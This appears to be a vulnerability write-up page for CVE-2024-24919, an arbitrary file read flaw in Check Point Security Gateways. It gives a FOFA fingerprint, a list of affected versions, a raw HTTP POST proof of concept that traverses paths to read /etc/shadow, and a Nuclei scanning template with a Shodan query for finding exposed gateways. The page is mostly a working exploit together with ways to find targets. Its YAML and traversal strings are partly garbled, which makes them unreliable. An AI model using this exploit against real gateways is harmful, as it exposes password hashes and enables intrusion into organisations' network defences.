Check-Point Security Gateway Arbitrary File Read Vulnerability (CVE-2024-24919)

descriptive

Check Point Security Gateways is a family of network security solutions from Check Point Software. These solutions, which include Next Generation Firewalls (NGFWs), Data Center Security Gateways and AI-powered Quantum Gateways, are designed to provide organizations with advanced protection against complex cyber threats. They secure networks, clouds, mobile and endpoints with integrated threat protection, unified security management and policy control.

fofa

icon_hash="1440532452″

Affected versions

Check Point Security Gateways R77.20 (EOL)
Check Point Security Gateways R77.30 (EOL)
Check Point Security Gateways R80.10 (EOL)
Check Point Security Gateways R80.20 (EOL)
Check Point Security Gateways R80.20.x
Check Point Security Gateways R80.20SP (EOL)
Check Point Security Gateways R80.30 (EOL)
Check Point Security Gateways R80.30SP (EOL)
Check Point Security Gateways R80.40 (EOL)
Check Point Security Gateways R81
Check Point Security Gateways R81.10
Check Point Security Gateways R81.10.x
Check Point Security Gateways R81.20

poc

POST /clients/MyCRL HTTP/1.1
Host: ip
Content-Length: 39

aCSHELL/... /... /... /... /... /... /... /etc/shadow

image-20240530235057951

poc yaml

id: CVE-2024-24919

info.
name: Check Point Quantum Gateway - Information Disclosure
author: johnk3r
severity: high
description: |
CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN or mobile access software blade.
reference.
- https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
- https://support.checkpoint.com/results/sk/sk182337
metadata.
max-request: 1
vendor: checkpoint
product: quantum_security_gateway
cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:*:*:*:*:*:*
shodan-query: html: "Check Point SSL Network"
verified: true
tags: cve,cve2024,checkpoint,lfi

http.
- raw.
– |
POST /clients/MyCRL HTTP/1.1
Host: {{Hostname}}

aCSHELL/... /... /... /... /... /... /... /etc/shadow

matchers-condition: and
matchers.
- type: regex
part: body
regex.
- "root:"
- "nobody:"
condition: and

- type: status
status.
– 200

Comments

Add comment
  • Comment list is empty